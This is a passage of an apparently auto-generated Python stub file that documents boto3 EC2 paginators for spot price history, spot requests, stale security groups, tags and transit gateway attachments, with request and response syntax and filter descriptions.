:param Filters:
One or more filters.
* ``availability-zone-group`` - The Availability Zone group.
* ``create-time`` - The time stamp when the Spot Instance request was created.
* ``fault-code`` - The fault code related to the request.
* ``fault-message`` - The fault message related to the request.
* ``instance-id`` - The ID of the instance that fulfilled the request.
* ``launch-group`` - The Spot Instance launch group.
* ``launch.block-device-mapping.delete-on-termination`` - Indicates whether the EBS volume is deleted on instance termination.
* ``launch.block-device-mapping.device-name`` - The device name for the volume in the block device mapping (for example, ``/dev/sdh`` or ``xvdh`` ).
* ``launch.block-device-mapping.snapshot-id`` - The ID of the snapshot for the EBS volume.
* ``launch.block-device-mapping.volume-size`` - The size of the EBS volume, in GiB.
* ``launch.block-device-mapping.volume-type`` - The type of EBS volume: ``gp2`` for General Purpose SSD, ``io1`` for Provisioned IOPS SSD, ``st1`` for Throughput Optimized HDD, ``sc1`` for Cold HDD, or ``standard`` for Magnetic.
* ``launch.group-id`` - The ID of the security group for the instance.
* ``launch.group-name`` - The name of the security group for the instance.
* ``launch.image-id`` - The ID of the AMI.
* ``launch.instance-type`` - The type of instance (for example, ``m3.medium`` ).
* ``launch.kernel-id`` - The kernel ID.
* ``launch.key-name`` - The name of the key pair the instance launched with.
* ``launch.monitoring-enabled`` - Whether detailed monitoring is enabled for the Spot Instance.
* ``launch.ramdisk-id`` - The RAM disk ID.
* ``launched-availability-zone`` - The Availability Zone in which the request is launched.
* ``network-interface.addresses.primary`` - Indicates whether the IP address is the primary private IP address.
* ``network-interface.delete-on-termination`` - Indicates whether the network interface is deleted when the instance is terminated.
* ``network-interface.description`` - A description of the network interface.
* ``network-interface.device-index`` - The index of the device for the network interface attachment on the instance.
* ``network-interface.group-id`` - The ID of the security group associated with the network interface.
* ``network-interface.network-interface-id`` - The ID of the network interface.
* ``network-interface.private-ip-address`` - The primary private IP address of the network interface.
* ``network-interface.subnet-id`` - The ID of the subnet for the instance.
* ``product-description`` - The product description associated with the instance (``Linux/UNIX`` | ``Windows`` ).
* ``spot-instance-request-id`` - The Spot Instance request ID.
* ``spot-price`` - The maximum hourly price for any Spot Instance launched to fulfill the request.
* ``state`` - The state of the Spot Instance request (``open`` | ``active`` | ``closed`` | ``cancelled`` | ``failed`` ). Spot request status information can help you track your Amazon EC2 Spot Instance requests. For more information, see `Spot Request Status <https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/spot-bid-status.html>`__ in the *Amazon EC2 User Guide for Linux Instances* .
* ``status-code`` - The short code describing the most recent evaluation of your Spot Instance request.
* ``status-message`` - The message explaining the status of the Spot Instance request.
* ``tag`` :<key> - The key/value combination of a tag assigned to the resource. Use the tag key in the filter name and the tag value as the filter value. For example, to find all resources that have a tag with the key ``Owner`` and the value ``TeamA`` , specify ``tag:Owner`` for the filter name and ``TeamA`` for the filter value.
* ``tag-key`` - The key of a tag assigned to the resource. Use this filter to find all resources assigned a tag with a specific key, regardless of the tag value.
* ``type`` - The type of Spot Instance request (``one-time`` | ``persistent`` ).
* ``valid-from`` - The start date of the request.
* ``valid-until`` - The end date of the request.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type SpotInstanceRequestIds: list
:param SpotInstanceRequestIds:
One or more Spot Instance request IDs.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeSpotPriceHistory(Paginator):
def paginate(self, Filters: List = None, AvailabilityZone: str = None, DryRun: bool = None, EndTime: datetime = None, InstanceTypes: List = None, ProductDescriptions: List = None, StartTime: datetime = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_spot_price_history`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeSpotPriceHistory>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
AvailabilityZone='string',
DryRun=True|False,
EndTime=datetime(2015, 1, 1),
InstanceTypes=[
't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
],
ProductDescriptions=[
'string',
],
StartTime=datetime(2015, 1, 1),
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'SpotPriceHistory': [
{
'AvailabilityZone': 'string',
'InstanceType': 't1.micro'|'t2.nano'|'t2.micro'|'t2.small'|'t2.medium'|'t2.large'|'t2.xlarge'|'t2.2xlarge'|'t3.nano'|'t3.micro'|'t3.small'|'t3.medium'|'t3.large'|'t3.xlarge'|'t3.2xlarge'|'t3a.nano'|'t3a.micro'|'t3a.small'|'t3a.medium'|'t3a.large'|'t3a.xlarge'|'t3a.2xlarge'|'m1.small'|'m1.medium'|'m1.large'|'m1.xlarge'|'m3.medium'|'m3.large'|'m3.xlarge'|'m3.2xlarge'|'m4.large'|'m4.xlarge'|'m4.2xlarge'|'m4.4xlarge'|'m4.10xlarge'|'m4.16xlarge'|'m2.xlarge'|'m2.2xlarge'|'m2.4xlarge'|'cr1.8xlarge'|'r3.large'|'r3.xlarge'|'r3.2xlarge'|'r3.4xlarge'|'r3.8xlarge'|'r4.large'|'r4.xlarge'|'r4.2xlarge'|'r4.4xlarge'|'r4.8xlarge'|'r4.16xlarge'|'r5.large'|'r5.xlarge'|'r5.2xlarge'|'r5.4xlarge'|'r5.12xlarge'|'r5.24xlarge'|'r5.metal'|'r5a.large'|'r5a.xlarge'|'r5a.2xlarge'|'r5a.4xlarge'|'r5a.12xlarge'|'r5a.24xlarge'|'r5d.large'|'r5d.xlarge'|'r5d.2xlarge'|'r5d.4xlarge'|'r5d.12xlarge'|'r5d.24xlarge'|'r5d.metal'|'r5ad.large'|'r5ad.xlarge'|'r5ad.2xlarge'|'r5ad.4xlarge'|'r5ad.8xlarge'|'r5ad.12xlarge'|'r5ad.16xlarge'|'r5ad.24xlarge'|'x1.16xlarge'|'x1.32xlarge'|'x1e.xlarge'|'x1e.2xlarge'|'x1e.4xlarge'|'x1e.8xlarge'|'x1e.16xlarge'|'x1e.32xlarge'|'i2.xlarge'|'i2.2xlarge'|'i2.4xlarge'|'i2.8xlarge'|'i3.large'|'i3.xlarge'|'i3.2xlarge'|'i3.4xlarge'|'i3.8xlarge'|'i3.16xlarge'|'i3.metal'|'hi1.4xlarge'|'hs1.8xlarge'|'c1.medium'|'c1.xlarge'|'c3.large'|'c3.xlarge'|'c3.2xlarge'|'c3.4xlarge'|'c3.8xlarge'|'c4.large'|'c4.xlarge'|'c4.2xlarge'|'c4.4xlarge'|'c4.8xlarge'|'c5.large'|'c5.xlarge'|'c5.2xlarge'|'c5.4xlarge'|'c5.9xlarge'|'c5.18xlarge'|'c5d.large'|'c5d.xlarge'|'c5d.2xlarge'|'c5d.4xlarge'|'c5d.9xlarge'|'c5d.18xlarge'|'c5n.large'|'c5n.xlarge'|'c5n.2xlarge'|'c5n.4xlarge'|'c5n.9xlarge'|'c5n.18xlarge'|'cc1.4xlarge'|'cc2.8xlarge'|'g2.2xlarge'|'g2.8xlarge'|'g3.4xlarge'|'g3.8xlarge'|'g3.16xlarge'|'g3s.xlarge'|'cg1.4xlarge'|'p2.xlarge'|'p2.8xlarge'|'p2.16xlarge'|'p3.2xlarge'|'p3.8xlarge'|'p3.16xlarge'|'p3dn.24xlarge'|'d2.xlarge'|'d2.2xlarge'|'d2.4xlarge'|'d2.8xlarge'|'f1.2xlarge'|'f1.4xlarge'|'f1.16xlarge'|'m5.large'|'m5.xlarge'|'m5.2xlarge'|'m5.4xlarge'|'m5.12xlarge'|'m5.24xlarge'|'m5.metal'|'m5a.large'|'m5a.xlarge'|'m5a.2xlarge'|'m5a.4xlarge'|'m5a.12xlarge'|'m5a.24xlarge'|'m5d.large'|'m5d.xlarge'|'m5d.2xlarge'|'m5d.4xlarge'|'m5d.12xlarge'|'m5d.24xlarge'|'m5d.metal'|'m5ad.large'|'m5ad.xlarge'|'m5ad.2xlarge'|'m5ad.4xlarge'|'m5ad.8xlarge'|'m5ad.12xlarge'|'m5ad.16xlarge'|'m5ad.24xlarge'|'h1.2xlarge'|'h1.4xlarge'|'h1.8xlarge'|'h1.16xlarge'|'z1d.large'|'z1d.xlarge'|'z1d.2xlarge'|'z1d.3xlarge'|'z1d.6xlarge'|'z1d.12xlarge'|'z1d.metal'|'u-6tb1.metal'|'u-9tb1.metal'|'u-12tb1.metal'|'a1.medium'|'a1.large'|'a1.xlarge'|'a1.2xlarge'|'a1.4xlarge',
'ProductDescription': 'Linux/UNIX'|'Linux/UNIX (Amazon VPC)'|'Windows'|'Windows (Amazon VPC)',
'SpotPrice': 'string',
'Timestamp': datetime(2015, 1, 1)
},
]
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeSpotPriceHistory.
- **SpotPriceHistory** *(list) --*
The historical Spot prices.
- *(dict) --*
Describes the maximum price per hour that you are willing to pay for a Spot Instance.
- **AvailabilityZone** *(string) --*
The Availability Zone.
- **InstanceType** *(string) --*
The instance type.
- **ProductDescription** *(string) --*
A general description of the AMI.
- **SpotPrice** *(string) --*
The maximum price per hour that you are willing to pay for a Spot Instance.
- **Timestamp** *(datetime) --*
The date and time the request was created, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
:type Filters: list
:param Filters:
One or more filters.
* ``availability-zone`` - The Availability Zone for which prices should be returned.
* ``instance-type`` - The type of instance (for example, ``m3.medium`` ).
* ``product-description`` - The product description for the Spot price (``Linux/UNIX`` | ``SUSE Linux`` | ``Windows`` | ``Linux/UNIX (Amazon VPC)`` | ``SUSE Linux (Amazon VPC)`` | ``Windows (Amazon VPC)`` ).
* ``spot-price`` - The Spot price. The value must match exactly (or use wildcards; greater than or less than comparison is not supported).
* ``timestamp`` - The time stamp of the Spot price history, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z). You can use wildcards (* and ?). Greater than or less than comparison is not supported.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type AvailabilityZone: string
:param AvailabilityZone:
Filters the results by the specified Availability Zone.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type EndTime: datetime
:param EndTime:
The date and time, up to the current date, from which to stop retrieving the price history data, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
:type InstanceTypes: list
:param InstanceTypes:
Filters the results by the specified instance types.
- *(string) --*
:type ProductDescriptions: list
:param ProductDescriptions:
Filters the results by the specified basic product descriptions.
- *(string) --*
:type StartTime: datetime
:param StartTime:
The date and time, up to the past 90 days, from which to start retrieving the price history data, in UTC format (for example, *YYYY* -*MM* -*DD* T*HH* :*MM* :*SS* Z).
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeStaleSecurityGroups(Paginator):
def paginate(self, VpcId: str, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_stale_security_groups`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeStaleSecurityGroups>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
VpcId='string',
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'StaleSecurityGroupSet': [
{
'Description': 'string',
'GroupId': 'string',
'GroupName': 'string',
'StaleIpPermissions': [
{
'FromPort': 123,
'IpProtocol': 'string',
'IpRanges': [
'string',
],
'PrefixListIds': [
'string',
],
'ToPort': 123,
'UserIdGroupPairs': [
{
'Description': 'string',
'GroupId': 'string',
'GroupName': 'string',
'PeeringStatus': 'string',
'UserId': 'string',
'VpcId': 'string',
'VpcPeeringConnectionId': 'string'
},
]
},
],
'StaleIpPermissionsEgress': [
{
'FromPort': 123,
'IpProtocol': 'string',
'IpRanges': [
'string',
],
'PrefixListIds': [
'string',
],
'ToPort': 123,
'UserIdGroupPairs': [
{
'Description': 'string',
'GroupId': 'string',
'GroupName': 'string',
'PeeringStatus': 'string',
'UserId': 'string',
'VpcId': 'string',
'VpcPeeringConnectionId': 'string'
},
]
},
],
'VpcId': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **StaleSecurityGroupSet** *(list) --*
Information about the stale security groups.
- *(dict) --*
Describes a stale security group (a security group that contains stale rules).
- **Description** *(string) --*
The description of the security group.
- **GroupId** *(string) --*
The ID of the security group.
- **GroupName** *(string) --*
The name of the security group.
- **StaleIpPermissions** *(list) --*
Information about the stale inbound rules in the security group.
- *(dict) --*
Describes a stale rule in a security group.
- **FromPort** *(integer) --*
The start of the port range for the TCP and UDP protocols, or an ICMP type number. A value of ``-1`` indicates all ICMP types.
- **IpProtocol** *(string) --*
The IP protocol name (for ``tcp`` , ``udp`` , and ``icmp`` ) or number (see `Protocol Numbers) <http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml>`__ .
- **IpRanges** *(list) --*
The IP ranges. Not applicable for stale security group rules.
- *(string) --*
- **PrefixListIds** *(list) --*
The prefix list IDs for an AWS service. Not applicable for stale security group rules.
- *(string) --*
- **ToPort** *(integer) --*
The end of the port range for the TCP and UDP protocols, or an ICMP type number. A value of ``-1`` indicates all ICMP types.
- **UserIdGroupPairs** *(list) --*
The security group pairs. Returns the ID of the referenced security group and VPC, and the ID and status of the VPC peering connection.
- *(dict) --*
Describes a security group and AWS account ID pair.
- **Description** *(string) --*
A description for the security group rule that references this user ID group pair.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **GroupId** *(string) --*
The ID of the security group.
- **GroupName** *(string) --*
The name of the security group. In a request, use this parameter for a security group in EC2-Classic or a default VPC only. For a security group in a nondefault VPC, use the security group ID.
For a referenced security group in another VPC, this value is not returned if the referenced security group is deleted.
- **PeeringStatus** *(string) --*
The status of a VPC peering connection, if applicable.
- **UserId** *(string) --*
The ID of an AWS account.
For a referenced security group in another VPC, the account ID of the referenced security group is returned in the response. If the referenced security group is deleted, this value is not returned.
[EC2-Classic] Required when adding or removing rules that reference a security group in another AWS account.
- **VpcId** *(string) --*
The ID of the VPC for the referenced security group, if applicable.
- **VpcPeeringConnectionId** *(string) --*
The ID of the VPC peering connection, if applicable.
- **StaleIpPermissionsEgress** *(list) --*
Information about the stale outbound rules in the security group.
- *(dict) --*
Describes a stale rule in a security group.
- **FromPort** *(integer) --*
The start of the port range for the TCP and UDP protocols, or an ICMP type number. A value of ``-1`` indicates all ICMP types.
- **IpProtocol** *(string) --*
The IP protocol name (for ``tcp`` , ``udp`` , and ``icmp`` ) or number (see `Protocol Numbers) <http://www.iana.org/assignments/protocol-numbers/protocol-numbers.xhtml>`__ .
- **IpRanges** *(list) --*
The IP ranges. Not applicable for stale security group rules.
- *(string) --*
- **PrefixListIds** *(list) --*
The prefix list IDs for an AWS service. Not applicable for stale security group rules.
- *(string) --*
- **ToPort** *(integer) --*
The end of the port range for the TCP and UDP protocols, or an ICMP type number. A value of ``-1`` indicates all ICMP types.
- **UserIdGroupPairs** *(list) --*
The security group pairs. Returns the ID of the referenced security group and VPC, and the ID and status of the VPC peering connection.
- *(dict) --*
Describes a security group and AWS account ID pair.
- **Description** *(string) --*
A description for the security group rule that references this user ID group pair.
Constraints: Up to 255 characters in length. Allowed characters are a-z, A-Z, 0-9, spaces, and ._-:/()#,@[]+=;{}!$*
- **GroupId** *(string) --*
The ID of the security group.
- **GroupName** *(string) --*
The name of the security group. In a request, use this parameter for a security group in EC2-Classic or a default VPC only. For a security group in a nondefault VPC, use the security group ID.
For a referenced security group in another VPC, this value is not returned if the referenced security group is deleted.
- **PeeringStatus** *(string) --*
The status of a VPC peering connection, if applicable.
- **UserId** *(string) --*
The ID of an AWS account.
For a referenced security group in another VPC, the account ID of the referenced security group is returned in the response. If the referenced security group is deleted, this value is not returned.
[EC2-Classic] Required when adding or removing rules that reference a security group in another AWS account.
- **VpcId** *(string) --*
The ID of the VPC for the referenced security group, if applicable.
- **VpcPeeringConnectionId** *(string) --*
The ID of the VPC peering connection, if applicable.
- **VpcId** *(string) --*
The ID of the VPC for the security group.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type VpcId: string
:param VpcId: **[REQUIRED]**
The ID of the VPC.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeTags(Paginator):
def paginate(self, DryRun: bool = None, Filters: List = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_tags`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTags>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
DryRun=True|False,
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'Tags': [
{
'Key': 'string',
'ResourceId': 'string',
'ResourceType': 'client-vpn-endpoint'|'customer-gateway'|'dedicated-host'|'dhcp-options'|'elastic-ip'|'fleet'|'fpga-image'|'host-reservation'|'image'|'instance'|'internet-gateway'|'launch-template'|'natgateway'|'network-acl'|'network-interface'|'reserved-instances'|'route-table'|'security-group'|'snapshot'|'spot-instances-request'|'subnet'|'transit-gateway'|'transit-gateway-attachment'|'transit-gateway-route-table'|'volume'|'vpc'|'vpc-peering-connection'|'vpn-connection'|'vpn-gateway',
'Value': 'string'
},
]
}
**Response Structure**
- *(dict) --*
- **Tags** *(list) --*
The tags.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The tag key.
- **ResourceId** *(string) --*
The ID of the resource.
- **ResourceType** *(string) --*
The resource type.
- **Value** *(string) --*
The tag value.
:type DryRun: boolean
:param DryRun:
Checks whether you have the required permissions for the action, without actually making the request, and provides an error response. If you have the required permissions, the error response is ``DryRunOperation`` . Otherwise, it is ``UnauthorizedOperation`` .
:type Filters: list
:param Filters:
The filters.
* ``key`` - The tag key.
* ``resource-id`` - The ID of the resource.
* ``resource-type`` - The resource type (``customer-gateway`` | ``dedicated-host`` | ``dhcp-options`` | ``elastic-ip`` | ``fleet`` | ``fpga-image`` | ``image`` | ``instance`` | ``host-reservation`` | ``internet-gateway`` | ``launch-template`` | ``natgateway`` | ``network-acl`` | ``network-interface`` | ``reserved-instances`` | ``route-table`` | ``security-group`` | ``snapshot`` | ``spot-instances-request`` | ``subnet`` | ``volume`` | ``vpc`` | ``vpc-peering-connection`` | ``vpn-connection`` | ``vpn-gateway`` ).
* ``tag`` :<key> - The key/value combination of the tag. For example, specify \"tag:Owner\" for the filter name and \"TeamA\" for the filter value to find resources with the tag \"Owner=TeamA\".
* ``value`` - The tag value.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
* DescribeTags
* DescribeVolumes
* DescribeVpcs
- **Name** *(string) --*
The name of the filter. Filter names are case-sensitive.
- **Values** *(list) --*
The filter values. Filter values are case-sensitive.
- *(string) --*
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
class DescribeTransitGatewayAttachments(Paginator):
def paginate(self, TransitGatewayAttachmentIds: List = None, Filters: List = None, DryRun: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`EC2.Client.describe_transit_gateway_attachments`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/ec2-2016-11-15/DescribeTransitGatewayAttachments>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
TransitGatewayAttachmentIds=[
'string',
],
Filters=[
{
'Name': 'string',
'Values': [
'string',
]
},
],
DryRun=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'TransitGatewayAttachments': [
{
'TransitGatewayAttachmentId': 'string',
'TransitGatewayId': 'string',
'TransitGatewayOwnerId': 'string',
'ResourceOwnerId': 'string',
'ResourceType': 'vpc'|'vpn',
'ResourceId': 'string',
'State': 'pendingAcceptance'|'rollingBack'|'pending'|'available'|'modifying'|'deleting'|'deleted'|'failed'|'rejected'|'rejecting'|'failing',
'Association': {
'TransitGatewayRouteTableId': 'string',
'State': 'associating'|'associated'|'disassociating'|'disassociated'
},
'CreationTime': datetime(2015, 1, 1),
'Tags': [
{
'Key': 'string',
'Value': 'string'
},
]
},
],
}
**Response Structure**
- *(dict) --*
- **TransitGatewayAttachments** *(list) --*
Information about the attachments.
- *(dict) --*
Describes an attachment between a resource and a transit gateway.
- **TransitGatewayAttachmentId** *(string) --*
The ID of the attachment.
- **TransitGatewayId** *(string) --*
The ID of the transit gateway.
- **TransitGatewayOwnerId** *(string) --*
The ID of the AWS account that owns the transit gateway.
- **ResourceOwnerId** *(string) --*
The ID of the AWS account that owns the resource.
- **ResourceType** *(string) --*
The resource type.
- **ResourceId** *(string) --*
The ID of the resource.
- **State** *(string) --*
The attachment state.
- **Association** *(dict) --*
The association.
- **TransitGatewayRouteTableId** *(string) --*
The ID of the route table for the transit gateway.
- **State** *(string) --*
The state of the association.
- **CreationTime** *(datetime) --*
The creation time.
- **Tags** *(list) --*
The tags for the attachment.
- *(dict) --*
Describes a tag.
- **Key** *(string) --*
The key of the tag.
Constraints: Tag keys are case-sensitive and accept a maximum of 127 Unicode characters. May not begin with ``aws:`` .
- **Value** *(string) --*
The value of the tag.
Constraints: Tag values are case-sensitive and accept a maximum of 255 Unicode characters.
:type TransitGatewayAttachmentIds: list
:param TransitGatewayAttachmentIds:
The IDs of the attachments.
- *(string) --*
:type Filters: list
:param Filters:
One or more filters. The possible values are:
* ``association.state`` - The state of the association (``associating`` | ``associated`` | ``disassociating`` ).
* ``association.transit-gateway-route-table-id`` - The ID of the route table for the transit gateway.
* ``resource-id`` - The ID of the resource.
* ``resource-owner-id`` - The ID of the AWS account that owns the resource.
* ``resource-type`` - The resource type (``vpc`` | ``vpn`` ).
* ``state`` - The state of the attachment (``available`` | ``deleted`` | ``deleting`` | ``failed`` | ``modifying`` | ``pendingAcceptance`` | ``pending`` | ``rollingBack`` | ``rejected`` | ``rejecting`` ).
* ``transit-gateway-attachment-id`` - The ID of the attachment.
* ``transit-gateway-id`` - The ID of the transit gateway.
* ``transit-gateway-owner-id`` - The ID of the AWS account that owns the transit gateway.
- *(dict) --*
A filter name and value pair that is used to return a more specific list of results from a describe operation. Filters can be used to match a set of resources by specific criteria, such as tags, attributes, or IDs. The filters supported by a describe operation are documented with the describe operation. For example:
* DescribeAvailabilityZones
* DescribeImages
* DescribeInstances
* DescribeKeyPairs
* DescribeSecurityGroups
* DescribeSnapshots
* DescribeSubnets
